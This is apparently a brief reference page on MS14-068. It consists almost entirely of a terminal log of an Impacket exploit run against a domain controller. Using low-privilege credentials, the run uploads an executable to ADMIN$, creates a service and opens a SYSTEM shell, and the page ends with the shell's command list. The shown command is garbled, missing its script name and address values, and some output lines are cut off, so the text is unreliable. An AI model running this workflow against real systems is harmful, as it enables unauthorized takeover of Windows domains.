Ms14 068

/impacket/examples [git:master]$ python -dc-ip -target-ip exploit.local/notanadmin:ASDqwe123@dc1
Impacket v0.9.14-dev - Copyright 2002-2015 Core Security Technologies

[*] User SID: S-1-5-21-3211488530-130973289-431960246-1104
[-] Couldn't get forest info ([Errno Connection error (exploit.local:445)] [Errno 8] nodename nor servname provided, or not known), continuing
[*] Attacking domain controller
[*] found vulnerable!
[*] Requesting shares on
[*] Found writable share ADMIN$
[*] Uploading file tXLpAWiu.exe
[*] Opening SVCManager on
[*] Creating service TKWq on
[*] Starting service TKWq.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.


 lcd {path}                 - changes the current local directory to {path}
 exit                       - terminates the server process (and this session)
 put {src_file, dst_path}   - uploads a local file to the dst_path RELATIVE to the connected share (ADMIN$)
 get {file}                 - downloads pathname RELATIVE to the connected share (ADMIN$) to the current local dir
 ! {cmd}                    - executes a local shell cmd

Want to contribute? Get in touch!
Last updated on 5th Jul 2017